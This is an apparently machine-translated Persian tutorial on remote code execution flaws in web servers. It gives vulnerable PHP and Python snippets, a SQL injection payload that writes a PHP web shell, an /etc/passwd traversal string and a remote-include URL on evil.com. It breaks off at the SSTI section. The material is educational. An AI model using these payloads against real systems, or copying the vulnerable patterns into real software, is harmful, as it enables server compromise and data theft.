\u06cc\u06a9 \u0633\u0631\u0648\u0631 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u062c\u0631\u0627 \u06a9\u0646\u0646\u062f. 
\u062f\u0631 \u0635\u0648\u0631\u062a \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u060c \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647:<\/p>\n<ul>\n<li>\u0633\u0627\u0632\u0634 \u06a9\u0627\u0645\u0644 \u0633\u06cc\u0633\u062a\u0645<\/li>\n<li>\u0646\u0642\u0636 \u062f\u0627\u062f\u0647 \u0647\u0627<\/li>\n<li>\u0646\u0635\u0628 \u0628\u062f\u0627\u0641\u0632\u0627\u0631<\/li>\n<li>\u067e\u0634\u062a\u0648\u0627\u0646\u0647 \u0647\u0627\u06cc \u0645\u062f\u0627\u0648\u0645<\/li>\n<\/ul>\n<p>RCE \u06a9\u0646\u062a\u0631\u0644 \u0647\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0646\u0638\u0645 \u0648 \u0645\u06a9\u0627\u0646\u06cc\u0633\u0645 \u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0631\u0627 \u0627\u0632 \u0628\u06cc\u0646 \u0645\u06cc \u0628\u0631\u062f \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0633\u0637\u062d \u0627\u062f\u0627\u0631\u06cc \u0645\u0647\u0627\u062c\u0645 \u0631\u0627 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u0631\u0627\u0626\u0647 \u0645\u06cc \u062f\u0647\u062f.<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A7%D9%86%D9%88%D8%A7%D8%B9_%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_RCE_%D9%85%D8%B4%D8%AA%D8%B1%DA%A9_%D8%AF%D8%B1_%D8%B3%D8%B1%D9%88%D8%B1%D9%87%D8%A7%DB%8C_%D9%88%D8%A8\"><\/span>\n<p>  \u0627\u0646\u0648\u0627\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc RCE \u0645\u0634\u062a\u0631\u06a9 \u062f\u0631 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fse2i2fx2wp6nax6x2tau.png\" alt=\"\u0627\u0646\u0648\u0627\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc RCE \u0645\u0634\u062a\u0631\u06a9 \u062f\u0631 
\u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%D8%AA%D8%B2%D8%B1%DB%8C%D9%82\"><\/span>\n<p>  \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642:<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><span class=\"ez-toc-section\" id=\"%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_%D9%81%D8%B1%D9%85%D8%A7%D9%86\"><\/span>\n<p>  \u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u0632 \u0627\u0639\u062a\u0628\u0627\u0631 \u0648\u0631\u0648\u062f\u06cc \u0636\u0639\u06cc\u0641 \u0628\u0631\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0633\u0637\u062d \u0633\u06cc\u0633\u062a\u0645 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc \u0645\u06cc \u06a9\u0646\u0646\u062f. 
\u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u0645\u062b\u0627\u0644:<\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight php\"><code><span class=\"cp\"><?php <\/span?> <span class=\"nv\">$cmd<\/span> <span class=\"o\">=<\/span> <span class=\"nv\">$_GET<\/span><span class=\"p\">[<\/span><span class=\"s1\">'cmd'<\/span><span class=\"p\">];<\/span> <span class=\"nb\">system<\/span><span class=\"p\">(<\/span><span class=\"nv\">$cmd<\/span><span class=\"p\">);<\/span> <span class=\"cp\">?&gt;<\/span>\n<\/span><\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>URL \u0645\u0627\u0646\u0646\u062f <code>example.com\/vuln.php?cmd=whoami<\/code> \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc \u062f\u0647\u062f \u062a\u0627 \u06cc\u06a9 \u0645\u0647\u0627\u062c\u0645 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0631\u0627 \u0645\u0633\u062a\u0642\u06cc\u0645\u0627\u064b \u0631\u0648\u06cc \u0633\u0631\u0648\u0631 \u0627\u062c\u0631\u0627 
\u06a9\u0646\u062f.<\/p>\n<p><strong>\u0633\u0627\u06cc\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0639\u0627\u0645\u0644 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u062f\u06cc\u062f\u0647:<\/strong> node.js (\u0627\u0632 \u0637\u0631\u06cc\u0642 <code>child_process.exec()<\/code>) \u060c \u067e\u0627\u06cc\u062a\u0648\u0646 <code>os.system()<\/code>\u0628\u0634\u0631<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_SQL_%D8%A8%D9%87_RCE\"><\/span>\n<p>  \u062a\u0632\u0631\u06cc\u0642 SQL \u0628\u0647 RCE<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u062f\u0631 \u062d\u0627\u0644\u06cc \u06a9\u0647 \u062a\u0632\u0631\u06cc\u0642 SQL \u0628\u0647 \u0637\u0648\u0631 \u0645\u0639\u0645\u0648\u0644 \u067e\u0627\u06cc\u06af\u0627\u0647 \u062f\u0627\u062f\u0647 \u0647\u0627 \u0631\u0627 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u0645\u06cc \u062f\u0647\u062f \u060c \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0628\u0647 RCE \u062a\u0628\u062f\u06cc\u0644 \u0634\u0648\u062f. 
\u0645\u062b\u0627\u0644:<\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight sql\"><code><span class=\"s1\">' UNION SELECT \"<?php system($_GET['<\/span?><span class=\"n\">cmd<\/span><span class=\"s1\">']);?&gt;\" INTO OUTFILE '<\/span><span class=\"o\">\/<\/span><span class=\"n\">var<\/span><span class=\"o\">\/<\/span><span class=\"n\">www<\/span><span class=\"o\">\/<\/span><span class=\"n\">html<\/span><span class=\"o\">\/<\/span><span class=\"n\">shell<\/span><span class=\"p\">.<\/span><span class=\"n\">php<\/span><span class=\"s1\">'\n<\/span><\/span><\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u0627\u06cc\u0646 \u06cc\u06a9 \u067e\u0648\u0633\u062a\u0647 \u0648\u0628 \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc \u06a9\u0646\u062f \u0648 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u0639\u062f\u0627\u0645 \u06a9\u0627\u0645\u0644 \u0641\u0631\u0645\u0627\u0646 \u0645\u06cc \u062f\u0647\u062f.<\/p>\n<h3><span 
class=\"ez-toc-section\" id=\"%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_LDAP\"><\/span>\n<p>  \u062a\u0632\u0631\u06cc\u0642 LDAP<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u06a9\u0645\u062a\u0631 \u0631\u0627\u06cc\u062c \u0627\u0645\u0627 \u0628\u0647 \u0647\u0645\u0627\u0646 \u0627\u0646\u062f\u0627\u0632\u0647 \u06a9\u0634\u0646\u062f\u0647 \u0627\u0633\u062a. \u0646\u0645\u0627\u06cc\u0634 \u062f\u0627\u062f\u0647 \u0634\u062f\u06af\u0627\u0646 LDAP \u0646\u0627\u062f\u0631\u0633\u062a \u0645\u06cc \u062a\u0648\u0627\u0646\u0646\u062f \u062c\u0631\u06cc\u0627\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0631\u0627 \u062f\u0631 \u0645\u0639\u0631\u0636 \u062f\u06cc\u062f \u0642\u0631\u0627\u0631 \u062f\u0647\u0646\u062f \u06cc\u0627 \u0628\u0627 \u0633\u0627\u06cc\u0631 \u0646\u0642\u0635 \u0647\u0627 \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 RCE \u0632\u0646\u062c\u06cc\u0631 \u0634\u0648\u0646\u062f.<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D9%86%D8%A7%D8%A7%D9%85%D9%86_%D8%B4%D8%AF%D9%86_%D9%86%D8%A7%D8%A7%D9%85%D9%86_%D9%BE%D8%B4%D8%AA%DB%8C_%D9%BE%D9%86%D9%87%D8%A7%D9%86\"><\/span>\n<p>  \u0646\u0627\u0627\u0645\u0646 \u0634\u062f\u0646 \u0646\u0627\u0627\u0645\u0646: \u067e\u0634\u062a\u06cc \u067e\u0646\u0647\u0627\u0646<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fidzeqbgtlzb7wdksxgg8.png\" alt=\"\u0646\u0627\u0627\u0645\u0646 \u0634\u062f\u0646 \u0646\u0627\u0627\u0645\u0646\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<p>\u0647\u0646\u06af\u0627\u0645\u06cc \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0647\u0627 \u0628\u062f\u0648\u0646 \u062a\u0623\u06cc\u06cc\u062f \u060c \u0648\u0631\u0648\u062f\u06cc 
\u06a9\u0627\u0631\u0628\u0631 \u0631\u0627 \u0631\u0647\u0627 \u0645\u06cc \u06a9\u0646\u0646\u062f \u060c \u062f\u0631\u0647\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0634\u06cc\u0621 \u062f\u0644\u062e\u0648\u0627\u0647 \u0648 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0631\u0627 \u0628\u0627\u0632 \u0645\u06cc \u06a9\u0646\u0646\u062f.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%D9%85%D8%AB%D8%A7%D9%84_%D8%AF%D8%B1_%D9%81%D9%84%D8%A7%D8%B3%DA%A9_%D9%BE%D8%A7%DB%8C%D8%AA%D9%88%D9%86\"><\/span>\n<p>  \u0645\u062b\u0627\u0644 \u062f\u0631 \u0641\u0644\u0627\u0633\u06a9 \u067e\u0627\u06cc\u062a\u0648\u0646:<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight python\"><code><span class=\"n\">user<\/span> <span class=\"o\">=<\/span> <span class=\"n\">pickle<\/span><span class=\"p\">.<\/span><span class=\"nf\">loads<\/span><span class=\"p\">(<\/span><span class=\"n\">base64<\/span><span class=\"p\">.<\/span><span class=\"nf\">b64decode<\/span><span class=\"p\">(<\/span><span class=\"n\">request<\/span><span class=\"p\">.<\/span><span class=\"n\">form<\/span><span class=\"p\">[<\/span><span class=\"sh\">'<\/span><span class=\"s\">payload<\/span><span class=\"sh\">'<\/span><span class=\"p\">]))<\/span>\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" 
class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u06cc\u06a9 payload \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u0634\u062f\u0647 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0647\u0646\u06af\u0627\u0645 \u067e\u0631\u062f\u0627\u0632\u0634 \u062a\u0648\u0633\u0637 \u0633\u0631\u0648\u0631 \u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f.<\/p>\n<p><strong>\u0646\u06a9\u062a\u0647 \u06a9\u0627\u0647\u0634:<\/strong> \u0627\u0632 \u0633\u0631\u06cc\u0627\u0644 \u0633\u0627\u0632\u06cc \u0628\u0648\u0645\u06cc \u0645\u0627\u0646\u0646\u062f <code>pickle<\/code> \u06cc\u0627 <code>ObjectInputStream<\/code> \u062c\u0627\u0648\u0627 \u0627\u062c\u062a\u0646\u0627\u0628 \u06a9\u0646\u06cc\u062f \u0648 \u0628\u0647 \u062c\u0627\u06cc \u0622\u0646 \u0627\u0632 \u0642\u0627\u0644\u0628 \u0647\u0627\u06cc \u0627\u0645\u0646 \u0645\u0627\u0646\u0646\u062f JSON \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f.<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%DA%AF%D9%86%D8%AC%D8%A7%D9%86%D8%AF%D9%86_%D9%BE%D8%B1%D9%88%D9%86%D8%AF%D9%87_LFI_%D9%88_RFI\"><\/span>\n<p>  \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u06af\u0646\u062c\u0627\u0646\u062f\u0646 \u067e\u0631\u0648\u0646\u062f\u0647 (LFI \u0648 RFI)<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi8t8lg9q3yny4zchgjqq.png\" alt=\"\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc 
\u06af\u0646\u062c\u0627\u0646\u062f\u0646 \u067e\u0631\u0648\u0646\u062f\u0647\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<p>\u0647\u0646\u06af\u0627\u0645\u06cc \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0647\u0627 \u0628\u0647 \u0635\u0648\u0631\u062a \u067e\u0648\u06cc\u0627 \u067e\u0631\u0648\u0646\u062f\u0647 \u0647\u0627 \u0631\u0627 \u0628\u0631 \u0627\u0633\u0627\u0633 \u0648\u0631\u0648\u062f\u06cc \u06a9\u0627\u0631\u0628\u0631 \u0634\u0627\u0645\u0644 \u0645\u06cc \u0634\u0648\u0646\u062f:<\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight php\"><code><span class=\"cp\"><?php <\/span?> <span class=\"k\">include<\/span><span class=\"p\">(<\/span><span class=\"nv\">$_GET<\/span><span class=\"p\">[<\/span><span class=\"s1\">'page'<\/span><span class=\"p\">]<\/span><span class=\"mf\">.<\/span><span class=\"s2\">\".php\"<\/span><span class=\"p\">);<\/span> <span class=\"cp\">?&gt;<\/span>\n<\/span><\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 
15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0645\u06cc \u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 \u0627\u06cc\u0646 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f <strong>\u06af\u0646\u062c\u0627\u0646\u062f\u0646 \u067e\u0631\u0648\u0646\u062f\u0647 \u0645\u062d\u0644\u06cc<\/strong> (<code>..\/..\/etc\/passwd<\/code>) \u06cc\u0627 <strong>\u0634\u0645\u0648\u0644 \u067e\u0631\u0648\u0646\u062f\u0647 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631<\/strong> (<code>http:\/\/evil.com\/shell.txt<\/code>).<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%D8%A8%D8%A7%D8%B1%DA%AF%D8%B0%D8%A7%D8%B1%DB%8C_%D9%BE%D8%B1%D9%88%D9%86%D8%AF%D9%87\"><\/span>\n<p>  \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u067e\u0631\u0648\u0646\u062f\u0647<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0641\u0627\u06cc\u0644 \u0628\u062f\u0648\u0646 \u0627\u0631\u0632\u06cc\u0627\u0628\u06cc \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc \u062f\u0647\u062f \u062a\u0627 \u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0647\u0627\u06cc \u0645\u062e\u0631\u0628 \u0631\u0627 \u0645\u0633\u062a\u0642\u0631 \u06a9\u0646\u0646\u062f:<\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight php\"><code><span class=\"nb\">move_uploaded_file<\/span><span class=\"p\">(<\/span><span class=\"nv\">$_FILES<\/span><span class=\"p\">[<\/span><span class=\"s1\">'file'<\/span><span class=\"p\">][<\/span><span class=\"s1\">'tmp_name'<\/span><span class=\"p\">],<\/span> <span class=\"s2\">\"uploads\/\"<\/span><span class=\"mf\">.<\/span><span class=\"nv\">$_FILES<\/span><span 
class=\"p\">[<\/span><span class=\"s1\">'file'<\/span><span class=\"p\">][<\/span><span class=\"s1\">'name'<\/span><span class=\"p\">]);<\/span>\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u0627\u06af\u0631 <code>shell.php<\/code> \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a \u060c \u0645\u06cc \u062a\u0648\u0627\u0646 \u0622\u0646 \u0631\u0627 \u0622\u063a\u0627\u0632 \u06a9\u0631\u062f:<\/p>\n<p><code>example.com\/uploads\/shell.php?cmd=ls<\/code><\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%B3%D8%B1%D8%B1%DB%8C%D8%B2_%D8%A8%D8%A7%D9%81%D8%B1_%D9%82%D8%AF%DB%8C%D9%85%DB%8C_%D8%A7%D9%85%D8%A7_%D8%B7%D9%84%D8%A7\"><\/span>\n<p>  \u0633\u0631\u0631\u06cc\u0632 \u0628\u0627\u0641\u0631: \u0642\u062f\u06cc\u0645\u06cc \u0627\u0645\u0627 \u0637\u0644\u0627<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u063a\u0627\u0644\u0628\u0627\u064b \u062f\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u0647\u0627\u06cc 
\u06a9\u062f \u0628\u0648\u0645\u06cc \u060c \u0633\u0631\u0631\u06cc\u0632 \u0628\u0627\u0641\u0631 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc \u062f\u0647\u062f \u062a\u0627 \u062d\u0627\u0641\u0638\u0647-\u0627\u0632 \u062c\u0645\u0644\u0647 \u0622\u062f\u0631\u0633 \u0647\u0627\u06cc \u0628\u0627\u0632\u06af\u0634\u062a-\u0631\u0627 \u0628\u0631\u0627\u06cc \u0646\u0648\u0634\u062a\u0646 \u062c\u0631\u06cc\u0627\u0646 \u06a9\u0646\u062a\u0631\u0644 \u0648 \u0627\u062c\u0631\u0627\u06cc \u067e\u0648\u0633\u062a\u0647 \u067e\u0648\u0633\u062a\u0647 \u062a\u0632\u0631\u06cc\u0642 \u0634\u062f\u0647 \u060c \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u06a9\u0646\u0646\u062f.<\/p>\n<p>\u06af\u0631\u0686\u0647 \u062f\u0631 \u0686\u0627\u0631\u0686\u0648\u0628 \u0647\u0627\u06cc \u0648\u0628 \u0633\u0637\u062d \u0628\u0627\u0644\u0627 \u0646\u0627\u062f\u0631 \u0627\u0633\u062a \u060c \u0627\u0645\u0627 \u0627\u06cc\u0646 \u0645\u0648\u0627\u0631\u062f \u0647\u0645\u0686\u0646\u0627\u0646 \u0645\u0631\u062a\u0628\u0637 \u0647\u0633\u062a\u0646\u062f <strong>\u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628 \u062c\u0627\u0633\u0627\u0632\u06cc \u0634\u062f\u0647<\/strong>\u0628\u0627 <strong>C\/C ++ Backends<\/strong>\u060c \u06cc\u0627 <strong>\u067e\u0627\u0646\u0644 \u0647\u0627\u06cc \u0645\u062f\u06cc\u0631 IoT<\/strong>\u0628\u0634\u0631<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_%D8%A7%D9%84%DA%AF%D9%88%DB%8C_%D8%B3%D9%85%D8%AA_%D8%B3%D8%B1%D9%88%D8%B1_SSTI\"><\/span>\n<p>  \u062a\u0632\u0631\u06cc\u0642 \u0627\u0644\u06af\u0648\u06cc \u0633\u0645\u062a \u0633\u0631\u0648\u0631 (SSTI)<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" 
